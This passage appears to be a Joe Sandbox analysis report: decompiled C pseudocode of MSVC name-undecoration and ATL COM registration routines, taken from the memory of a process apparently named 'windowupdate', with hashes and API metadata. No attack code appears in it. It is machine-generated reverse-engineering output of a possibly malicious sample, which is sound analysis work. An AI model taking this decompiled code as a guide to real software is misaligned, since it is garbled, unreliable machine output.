                      							__ecx =  *__eax;
                      							_v12 =  *__eax;
                      							__eflags = _v12 - 0x59;
                      							if(__eflags > 0) {
                      								L27:
                      								__ecx = _a4;
                      								E00D4F350(_a4, 2) = _a4;
                      								return _a4;
                      							}
                      							_t36 = _v12 + 0xd56edc; // 0xcccccc09
                      							__eax =  *_t36 & 0x000000ff;
                      							switch( *((intOrPtr*)(( *_t36 & 0x000000ff) * 4 +  &M00D56EB0))) {
                      								case 0:
                      									__eax = _a8;
                      									__ecx = _a4;
                      									E00D4FB00(__eflags, _a4, 1, _a8) = _a4;
                      									return _a4;
                      								case 1:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__edx = _a8;
                      									_a4 = E00D55490(__ebx, __edi, __esi, _a4, _a8);
                      									__eax = _a4;
                      									return _a4;
                      								case 2:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__edx = _a8;
                      									_a4 = E00D56F40(__ebx, __edi, __esi, _a4, _a8, 1);
                      									__eax = _a4;
                      									return _a4;
                      								case 3:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__ecx =  &_v92;
                      									__eax = E00D4F3F0( &_v92);
                      									__edx = _a8;
                      									 &_v100 = E00D53A20(__ebx, __edi, __esi,  &_v100, _a8, 0,  &_v100, 0);
                      									__ecx = _a4;
                      									__eax = _a4;
                      									return _a4;
                      								case 4:
                      									L19:
                      									__ecx = _a8;
                      									__ecx =  &_v84;
                      									__eax = E00D4F240( &_v84, _a8);
                      									__edx =  *0xf20640; // 0x0
                      									 *0xf20640 = __edx;
                      									__ecx =  &_v84;
                      									E00D5AB50( &_v84) =  &_v20;
                      									__ecx = _a4;
                      									E00D57370(_a4,  &_v20,  &_v20, 3) = _a4;
                      									return _a4;
                      								case 5:
                      									__ecx = _a8;
                      									__eax = E00D5A560(_a8);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										_v52 = E00D50060("volatile", 8);
                      										_v48 = __edx;
                      										__eax =  &_v52;
                      										__ecx =  &_v20;
                      										__eax = E00D4F7E0( &_v20,  &_v52);
                      									} else {
                      										_v44 = E00D50060("volatile ", 9);
                      										_v40 = __edx;
                      										__edx =  &_v44;
                      										__ecx =  &_v20;
                      										__eax = E00D4F7E0( &_v20,  &_v44);
                      									}
                      									goto L19;
                      								case 6:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__ecx = _a4;
                      									E00D4F350(_a4, 2) = _a4;
                      									return _a4;
                      								case 7:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__ecx = _a8;
                      									__eax = E00D5A560(_a8);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										_v68 = E00D50060("std::nullptr_t", 0xe);
                      										_v64 = __edx;
                      										__ecx =  &_v68;
                      										__ecx = _a4;
                      										E00D4F1F0(_a4,  &_v68) = _a4;
                      										return _a4;
                      									}
                      									_v60 = E00D50060("std::nullptr_t ", 0xf);
                      									_v56 = __edx;
                      									__ecx = _a8;
                      									__edx =  &_v60;
                      									_a4 = E00D4FAA0(_a4,  &_v60, _a8);
                      									__eax = _a4;
                      									return _a4;
                      								case 8:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									__edx = _a8;
                      									__ecx = _a4;
                      									E00D4F240(_a4, _a8) = _a4;
                      									return _a4;
                      								case 9:
                      									 *0xf20640 =  *0xf20640 + 1;
                      									 *0xf20640 =  *0xf20640 + 1;
                      									_a4 = E00D57B30(__ebx, __edi, __esi, __eflags, _a4);
                      									__eax = _a4;
                      									return _a4;
                      								case 0xa:
                      									goto L27;
                      							}
                      						}
                      						1 = 1 << 0;
                      						__ecx =  *0xf20640; // 0x0
                      						__edx =  *((char*)(__ecx + (1 << 0)));
                      						__eflags =  *((char*)(__ecx + (1 << 0)));
                      						if(__eflags == 0) {
                      							__eax = _a8;
                      							__ecx = _a4;
                      							E00D4FB00(__eflags, _a4, 1, _a8) = _a4;
                      							return _a4;
                      						}
                      						__ecx = _a4;
                      						E00D4F350(_a4, 2) = _a4;
                      						return _a4;
                      					case 2:
                      						L6:
                      						__edx = _a8;
                      						__ecx =  &_v76;
                      						__eax = E00D4F240( &_v76, _a8);
                      						__eax =  *0xf20640; // 0x0
                      						 *0xf20640 = __eax;
                      						__ecx =  &_v76;
                      						__eax = E00D5AB50( &_v76);
                      						__ecx =  &_v20;
                      						__edx = _a4;
                      						__eax = _a4;
                      						return _a4;
                      					case 3:
                      						__ecx = _a8;
                      						__eax = E00D5A560(_a8);
                      						__eflags = __eax;
                      						if(__eax != 0) {
                      							_v36 = E00D50060("volatile", 8);
                      							_v32 = __edx;
                      							__ecx =  &_v36;
                      							__ecx =  &_v20;
                      							__eax = E00D4F7E0( &_v20,  &_v36);
                      						} else {
                      							_v28 = E00D50060("volatile ", 9);
                      							_v24 = __edx;
                      							__eax =  &_v28;
                      							__ecx =  &_v20;
                      							__eax = E00D4F7E0( &_v20,  &_v28);
                      						}
                      						goto L6;
                      					case 4:
                      						goto L28;
                      				}
                      			}
























                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
                      • String ID: B$std::nullptr_t$std::nullptr_t $volatile$volatile
                      • API String ID: 1073764026-1853825697
                      • Opcode ID: f94e7db180c74c8ef343b48dc3c467bb816013f18ed3ff186b83bc25260a23b1
                      • Instruction ID: 78a5fba2226a9744a44773adb3ec24748b463ee7d689112d5f4cf0898fc3db08
                      • Opcode Fuzzy Hash: f94e7db180c74c8ef343b48dc3c467bb816013f18ed3ff186b83bc25260a23b1
                      • Instruction Fuzzy Hash: 33B180B6900108ABDB14DF54DC92EEE3B75FB94305F048128FD199B252EB31EA45DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00D5A1E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, signed char _a12) {
                      				signed int _v8;
                      				char _v24;
                      				signed char _v25;
                      				signed char _v26;
                      				char _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				char _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				signed int _v80;
                      				char _v84;
                      				signed int _v88;
                      				char _v92;
                      				char _v100;
                      				char _v108;
                      				char _v116;
                      				char _v124;
                      				char _v132;
                      				char _v140;
                      				char _v148;
                      				char _v156;
                      				char _v164;
                      				signed int _t75;
                      				signed int _t77;
                      				signed int _t81;
                      				void* _t82;
                      				void* _t83;
                      				intOrPtr _t87;
                      				char _t115;
                      				char _t117;
                      				signed int _t118;
                      				signed int _t123;
                      				void* _t127;
                      				intOrPtr _t129;
                      				signed int _t131;
                      				intOrPtr _t139;
                      				intOrPtr _t140;
                      				signed int _t143;
                      				signed int _t158;
                      				signed int _t163;
                      				intOrPtr _t168;
                      				signed int _t169;
                      				signed int _t172;
                      				intOrPtr _t174;
                      				signed int _t180;
                      				signed int _t181;
                      				signed int _t184;
                      				void* _t185;
                      				void* _t186;
                      				signed int _t187;
                      				void* _t188;
                      				void* _t190;
                      				void* _t191;
                      
                      				_t186 = __esi;
                      				_t185 = __edi;
                      				_t127 = __ebx;
                      				_t75 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t75 ^ _t187;
                      				_t77 =  *0xf20640; // 0x0
                      				_t129 =  *_t77 - 0x30;
                      				_v40 = _t129;
                      				if(_t129 < 0 || _v40 > 9) {
                      					E00D4F3F0( &_v36);
                      					_t169 =  *0xf20640; // 0x0
                      					if( *_t169 != 0x3f) {
                      						_v25 = 0;
                      						_v48 = E00D50060(0xdee94d, 0);
                      						_v44 = _t169;
                      						_t81 =  *0xf20640; // 0x0
                      						_t82 = E00D5AC10(_t81, "template-parameter-", 0x13);
                      						_t190 = _t188 + 0x14;
                      						if(_t82 != 0) {
                      							_t131 =  *0xf20640; // 0x0
                      							_t83 = E00D5AC10(_t131, "generic-type-", 0xd);
                      							_t191 = _t190 + 0xc;
                      							if(_t83 == 0) {
                      								_v25 = 1;
                      								_t115 = E00D50060("`generic-type-", 0xe);
                      								_t191 = _t191 + 8;
                      								_v92 = _t115;
                      								_v88 = _t169;
                      								_v48 = _v92;
                      								_v44 = _v88;
                      								_t158 =  *0xf20640; // 0x0
                      								 *0xf20640 = _t158 + 0xd;
                      							}
                      						} else {
                      							_v25 = 1;
                      							_t117 = E00D50060("`template-parameter-", 0x14);
                      							_t191 = _t190 + 8;
                      							_v84 = _t117;
                      							_v80 = _t169;
                      							_v48 = _v84;
                      							_v44 = _v80;
                      							_t118 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t118 + 0x13;
                      						}
                      						if((_v25 & 0x000000ff) == 0) {
                      							if((_a12 & 0x000000ff) == 0) {
                      								L26:
                      								E00D4F820( &_v36, E00D4F080( &_v164, 0xf20640, 0x40));
                      								goto L27;
                      							}
                      							_t172 =  *0xf20640; // 0x0
                      							if( *_t172 != 0x40) {
                      								goto L26;
                      							}
                      							E00D4F820( &_v36, E00D4F3F0( &_v156));
                      							_t143 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t143 + 1;
                      							goto L27;
                      						} else {
                      							E00D57C80(_t127, _t185, _t186,  &_v100);
                      							if(E00D5A510() == 0 ||  *0xf20650 == 0) {
                      								_v76 = E00D4FAA0( &_v140,  &_v48,  &_v100);
                      								E00D4F820( &_v36, E00D4FBB0(_v76,  &_v148, 0x27));
                      							} else {
                      								E00D57D80( &_v100,  &_v24, 0x10);
                      								_t174 =  *0xf20650; // 0x0
                      								_v68 = _t174;
                      								_v56 = _v68;
                      								 *0xdc62b0(E00D92B00( &_v24));
                      								_v60 = _v56();
                      								if(_v60 == 0) {
                      									_v72 = E00D4FAA0( &_v124,  &_v48,  &_v100);
                      									E00D4F820( &_v36, E00D4FBB0(_v72,  &_v132, 0x27));
                      								} else {
                      									_v26 = 0;
                      									_push(_v26 & 0x000000ff);
                      									E00D4F820( &_v36, E00D4E750( &_v116, _v60));
                      								}
                      							}
                      							L27:
                      							_t171 = _a8 & 0x000000ff;
                      							if((_a8 & 0x000000ff) != 0) {
                      								_t139 =  *0xf20638; // 0x0
                      								if(E00D5A590(_t139) == 0) {
                      									_t140 =  *0xf20638; // 0x0
                      									E00D4FF70(_t140,  &_v36);
                      								}
                      							}
                      							E00D4F240(_a4,  &_v36);
                      							_t87 = _a4;
                      							goto L31;
                      						}
                      					}
                      					E00D4F820( &_v36, E00D58500(_t127, _t185, _t186,  &_v108, 0));
                      					_t180 =  *0xf20640; // 0x0
                      					_v64 =  *_t180;
                      					_t163 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t163 + 1;
                      					if(_v64 != 0x40) {
                      						_t181 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t181 - 1;
                      						_t123 =  *0xf20640; // 0x0
                      						if( *_t123 == 0) {
                      							_v52 = 1;
                      						} else {
                      							_v52 = 2;
                      						}
                      						E00D4F920( &_v36, _v52);
                      					}
                      					goto L27;
                      				} else {
                      					_t184 =  *0xf20640; // 0x0
                      					_t171 = _t184 + 1;
                      					 *0xf20640 = _t184 + 1;
                      					_t168 =  *0xf20638; // 0x0
                      					E00D4F9A0(_t168, _a4, _v40);
                      					_t87 = _a4;
                      					L31:
                      					return E00D47280(_t87, _t127, _v8 ^ _t187, _t171, _t185, _t186);
                      				}
                      			}































































                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5A23B
                      • Mailbox.LIBCMTD ref: 00D5A260
                      • DName::operator=.LIBVCRUNTIMED ref: 00D5A2B8
                      • und_strncmp.LIBCMTD ref: 00D5A2E8
                      • DName::getString.LIBCMTD ref: 00D5A3B1
                      • Mailbox.LIBCMTD ref: 00D5A404
                        • Part of subcall function 00D4F9A0: DName::DName.LIBVCRUNTIMED ref: 00D4F9B8
                      • Replicator::isFull.LIBCMTD ref: 00D5A4D5
                      • Replicator::operator+=.LIBCMTD ref: 00D5A4E8
                      • Mailbox.LIBCMTD ref: 00D5A4F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
                      • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                      • API String ID: 3194277874-3433397351
                      • Opcode ID: 98e81e2ae495bbf3bdd680f6fc1613610f4f185d1374bb2ea9e0f251f900e4ef
                      • Instruction ID: 7a0f8b1d967162421068b6fd2a24ab8dd0a99ce52f95794c18eeb504f011b2c3
                      • Opcode Fuzzy Hash: 98e81e2ae495bbf3bdd680f6fc1613610f4f185d1374bb2ea9e0f251f900e4ef
                      • Instruction Fuzzy Hash: FEA14072D002289FDF24DFA8DC95AEEBBB5FF44301F144129E80967262EB705949CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00D3A960(void* __ebx, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12) {
                      				signed int _v8;
                      				char _v16;
                      				signed int _v24;
                      				signed int* _v28;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				char _v48;
                      				char _v184;
                      				signed int _v192;
                      				char* _v200;
                      				intOrPtr _v208;
                      				int* _v212;
                      				char* _v216;
                      				char _v224;
                      				signed int _v232;
                      				char _v364;
                      				char _v384;
                      				char _v404;
                      				int _v416;
                      				signed int _v424;
                      				char* _v428;
                      				char* _v432;
                      				char* _v436;
                      				char* _v440;
                      				char* _v444;
                      				char* _v448;
                      				char* _v456;
                      				int** _v464;
                      				intOrPtr* _v468;
                      				int* _v472;
                      				int** _v476;
                      				char* _v480;
                      				char* _v484;
                      				char* _v488;
                      				char* _v492;
                      				int* _v496;
                      				int* _v500;
                      				void* _v508;
                      				void* __edx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t175;
                      				signed int _t179;
                      				void* _t180;
                      				char* _t184;
                      				void* _t186;
                      				signed int _t189;
                      				signed int _t196;
                      				long _t221;
                      				long _t227;
                      				signed char _t231;
                      				void* _t238;
                      				signed int _t239;
                      				void* _t243;
                      				void* _t245;
                      				void* _t249;
                      				void* _t255;
                      				void* _t259;
                      				void* _t263;
                      				void* _t269;
                      				int* _t333;
                      				void* _t335;
                      				void* _t351;
                      				void* _t352;
                      				signed int _t354;
                      				void* _t355;
                      				void* _t356;
                      				int* _t357;
                      				int* _t362;
                      				int* _t365;
                      
                      				_t269 = __ebx;
                      				_t351 =  &_v500;
                      				memset(_t351, 0xcccccccc, 0x7c << 2);
                      				_t356 = _t355 + 0xc;
                      				_t352 = _t351 + 0x7c;
                      				_t175 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t175 ^ _t354;
                      				_v456 = 0;
                      				E00D3DE60( &_v16);
                      				_t368 = _a8;
                      				if(_a8 != 0) {
                      					_t179 = E00D31620( &_v16, _a4, 0xdc6390);
                      					_t357 = _t356 + 8;
                      					__eflags = _t179;
                      					if(_t179 == 0) {
                      						_t180 = E00D3DEE0( &_v16);
                      						_t353 = _t357;
                      						__imp__CoCreateInstance(0xdc7cd0, 0, 1, 0xdf02a0, _t180);
                      						__eflags = _t357 - _t357;
                      						_v24 = E00DC1520(_t180, _t357 - _t357);
                      						__eflags = _v24;
                      						if(__eflags >= 0) {
                      							_v24 = 0;
                      							_v28 = _a8;
                      							while(1) {
                      								__eflags =  *_v28;
                      								if( *_v28 == 0) {
                      									break;
                      								}
                      								_t239 = _v28[1];
                      								_v48 =  *_t239;
                      								_v44 =  *((intOrPtr*)(_t239 + 4));
                      								_v40 =  *((intOrPtr*)(_t239 + 8));
                      								_v36 =  *((intOrPtr*)(_t239 + 0xc));
                      								__eflags = _a12;
                      								if(_a12 == 0) {
                      									__eflags =  *_v28 - 1;
                      									if( *_v28 != 1) {
                      										__eflags =  *_v28 - 2;
                      										if(__eflags != 0) {
                      											_t245 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c5e, 0, "%ls", L"pEntry->iType == 2");
                      											_t357 = _t357 + 0x18;
                      											__eflags = _t245 - 1;
                      											if(_t245 == 1) {
                      												asm("int3");
                      											}
                      										}
                      										_v476 = E00D3DE90( &_v16);
                      										_t353 = _t357;
                      										_t333 =  *_v476;
                      										_t243 =  *(_t333[8])(_v476, _a4, 1,  &_v48);
                      										__eflags = _t357 - _t357;
                      										E00DC1520(_t243, _t357 - _t357);
                      									} else {
                      										_v472 = E00D3DE90( &_v16);
                      										_t353 = _t357;
                      										_t333 = _v472;
                      										_t249 =  *((intOrPtr*)( *((intOrPtr*)( *_t333 + 0x18))))(_v472, _a4, 1,  &_v48);
                      										__eflags = _t357 - _t357;
                      										E00DC1520(_t249, _t357 - _t357);
                      									}
                      									L27:
                      									_v28 =  &(_v28[2]);
                      									continue;
                      								}
                      								__eflags =  *_v28 - 1;
                      								if( *_v28 != 1) {
                      									__eflags =  *_v28 - 2;
                      									if(__eflags != 0) {
                      										_t259 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c4d, 0, "%ls", L"pEntry->iType == 2");
                      										_t357 = _t357 + 0x18;
                      										__eflags = _t259 - 1;
                      										if(_t259 == 1) {
                      											asm("int3");
                      										}
                      									}
                      									_v468 = E00D3DE90( &_v16);
                      									_t353 = _t357;
                      									_t333 =  *( *_v468 + 0x1c);
                      									_t255 =  *_t333(_v468, _a4, 1,  &_v48);
                      									__eflags = _t357 - _t357;
                      									_v24 = E00DC1520(_t255, _t357 - _t357);
                      								} else {
                      									_v464 = E00D3DE90( &_v16);
                      									_t353 = _t357;
                      									_t333 =  *_v464;
                      									_t263 =  *(_t333[5])(_v464, _a4, 1,  &_v48);
                      									__eflags = _t357 - _t357;
                      									_v24 = E00DC1520(_t263, _t357 - _t357);
                      								}
                      								__eflags = _v24;
                      								if(__eflags >= 0) {
                      									goto L27;
                      								} else {
                      									_v440 = _v24;
                      									E00D3B190( &_v16, __eflags);
                      									_t184 = _v440;
                      									goto L60;
                      								}
                      							}
                      							__eflags = _a12;
                      							if(__eflags != 0) {
                      								L59:
                      								_v448 = 0;
                      								E00D3B190( &_v16, __eflags);
                      								_t184 = _v448;
                      								goto L60;
                      							} else {
                      								goto L29;
                      							}
                      							while(1) {
                      								L29:
                      								_t353 = _t357;
                      								_t333 =  &_v184;
                      								__imp__StringFromGUID2(_a4, _t333, 0x40);
                      								__eflags = _t357 - _t357;
                      								_t189 = E00DC1520(_a4, _t357 - _t357);
                      								__eflags = _t189;
                      								if(_t189 == 0) {
                      									_v480 = 0;
                      								} else {
                      									_v480 = 1;
                      								}
                      								_v192 = _v480;
                      								__eflags = _v192;
                      								if(__eflags == 0) {
                      									_t238 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c69, 0, "%ls", L"__atl_condVal");
                      									_t357 = _t357 + 0x18;
                      									__eflags = _t238 - 1;
                      									if(_t238 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v192;
                      								if(__eflags == 0) {
                      									break;
                      								}
                      								__eflags = 0;
                      								if(0 != 0) {
                      									continue;
                      								}
                      								_v200 = 0;
                      								_v208 = E00D31AB0();
                      								_v212 = 0;
                      								_v216 = 0;
                      								E00D3F2E0( &_v224);
                      								_v212 =  &_v184;
                      								__eflags = _v212;
                      								if(__eflags != 0) {
                      									_t333 = _v212;
                      									_v200 = E00D85A70(_t333) + 1;
                      									_t196 = E00D31780(_t333, _t353, __eflags,  &_v200, _v200, 2);
                      									_t357 = _t357 + 0x10;
                      									__eflags = _t196;
                      									if(_t196 >= 0) {
                      										__eflags = _v200 - 0x400;
                      										if(__eflags > 0) {
                      											L45:
                      											_v500 = E00D3F270(_t269,  &_v224, __eflags, _v200);
                      											L46:
                      											_t333 = _v500;
                      											_v488 = E00D31BB0(_v212, _t353, _t333, _v212, _v200, _v208);
                      											L47:
                      											_v484 = _v488;
                      											L48:
                      											_v232 = _v484;
                      											__eflags = _v232;
                      											if(__eflags != 0) {
                      												E00D326C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
                      												E00D32780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, _v232);
                      												E00D32780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Required Categories");
                      												_t362 = _t357 + 0x24;
                      												E00D341F0( &_v384, 0x80000000);
                      												E00D341C0( &_v404, 0);
                      												_v416 = 0;
                      												_v424 = E00D345F0( &_v404, _t353, E00D34250( &_v384),  &_v364, 0x20019);
                      												__eflags = _v424;
                      												if(__eflags == 0) {
                      													_t353 = _t362;
                      													_t227 = RegQueryInfoKeyA(E00D34250( &_v404), 0, 0, 0,  &_v416, 0, 0, 0, 0, 0, 0, 0);
                      													__eflags = _t362 - _t362;
                      													_v424 = E00DC1520(_t227, _t362 - _t362);
                      													E00D34420( &_v404, _t362);
                      													__eflags = _v424;
                      													if(__eflags == 0) {
                      														__eflags = _v416;
                      														if(__eflags == 0) {
                      															E00D34310( &_v384, _t353,  &_v364);
                      														}
                      													}
                      												}
                      												E00D326C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
                      												_t333 =  &_v364;
                      												E00D32780(_t269, _t352, _t353, __eflags, _t333, 0x80, _v232);
                      												E00D32780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Implemented Categories");
                      												_t365 = _t362 + 0x24;
                      												_v424 = E00D345F0( &_v404, _t353, E00D34250( &_v384),  &_v364, 0x20019);
                      												__eflags = _v424;
                      												if(__eflags == 0) {
                      													_t353 = _t365;
                      													_t333 =  &_v416;
                      													_t221 = RegQueryInfoKeyA(E00D34250( &_v404), 0, 0, 0, _t333, 0, 0, 0, 0, 0, 0, 0);
                      													__eflags = _t365 - _t365;
                      													_v424 = E00DC1520(_t221, _t365 - _t365);
                      													E00D34420( &_v404, _t365);
                      													__eflags = _v424;
                      													if(__eflags == 0) {
                      														__eflags = _v416;
                      														if(__eflags == 0) {
                      															E00D34310( &_v384, _t353,  &_v364);
                      														}
                      													}
                      												}
                      												E00D34220( &_v404, __eflags);
                      												E00D34220( &_v384, __eflags);
                      											}
                      											E00D3F220( &_v224);
                      											goto L59;
                      										}
                      										_t231 = E00D31900(__eflags, _v200);
                      										_t357 = _t357 + 4;
                      										__eflags = _t231 & 0x000000ff;
                      										if(__eflags == 0) {
                      											goto L45;
                      										}
                      										_v492 =  &(_v200[0x24]);
                      										E00DBF1D0(_v492);
                      										_v496 = _t357;
                      										E00DC13A0(_v496, _v492,  &_v456);
                      										_v496 =  &(_v496[8]);
                      										_v500 = _v496;
                      										goto L46;
                      									}
                      									_v488 = 0;
                      									goto L47;
                      								}
                      								_v484 = 0;
                      								goto L48;
                      							}
                      							_v444 = 0xd;
                      							E00D3B190( &_v16, __eflags);
                      							_t184 = _v444;
                      						} else {
                      							_v436 = 0;
                      							E00D3B190( &_v16, __eflags);
                      							_t184 = _v436;
                      						}
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							__eflags = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c2e, 0, "%ls", L"0 && \"Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects.\"") - 1;
                      							if(__eflags == 0) {
                      								asm("int3");
                      							}
                      						}
                      						_v432 = 0;
                      						E00D3B190( &_v16, __eflags);
                      						_t184 = _v432;
                      					}
                      					goto L60;
                      				} else {
                      					_v428 = 0;
                      					E00D3B190( &_v16, _t368);
                      					_t184 = _v428;
                      					L60:
                      					E00DC13E0(_t269, _t354, 0xd3b0a0, _v456);
                      					_t186 = _t184;
                      					_t335 = _t333;
                      					return E00D47280(_t186, _t269, _v8 ^ _t354, _t335, _t352, _t353);
                      				}
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module
                      • String ID: $%ls$0 && "Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects."$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CLSID\$\Implemented Categories$\Required Categories$__atl_condVal$pEntry->iType == 2
                      • API String ID: 193471262-2261637480
                      • Opcode ID: 64da7918a2c9a5a40e1ae962d3a8c7b72f4b108bab31b89aa92ab61b1058b0ba
                      • Instruction ID: a3ca8d82ddbc65f06c7b86878921e8442543b95fbd959b167f3181cdaf64cbb2
                      • Opcode Fuzzy Hash: 64da7918a2c9a5a40e1ae962d3a8c7b72f4b108bab31b89aa92ab61b1058b0ba
                      • Instruction Fuzzy Hash: DF121575E002299FDB24EB54DC92BEEB3B5AF54300F1441D9E649A7281DB70AE84CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00DAC260(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, long long _a4, intOrPtr _a12, intOrPtr* _a16, char* _a20, char* _a24) {
                      				char _v5;
                      				void* _v6;
                      				signed char _v7;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				char _v56;
                      				signed int _t84;
                      				intOrPtr* _t100;
                      				void* _t103;
                      				intOrPtr* _t111;
                      				intOrPtr* _t112;
                      				signed int _t123;
                      				signed int _t127;
                      				intOrPtr _t136;
                      				void* _t141;
                      				void* _t142;
                      				void* _t143;
                      				void* _t144;
                      
                      				_t142 = __esi;
                      				_t141 = __edi;
                      				_t103 = __ebx;
                      				E00DAAA30( &_v56, __edx, __eflags);
                      				_v12 =  &_a4;
                      				_t123 =  *(_v12 + 4);
                      				_v28 = E00DBEEF0( *_v12, 0x3f, _t123) & 0x00000001;
                      				_v24 = _t123 & 0x00000000;
                      				if(_v28 != 1 || _v24 != 0) {
                      					_v5 = 0x20;
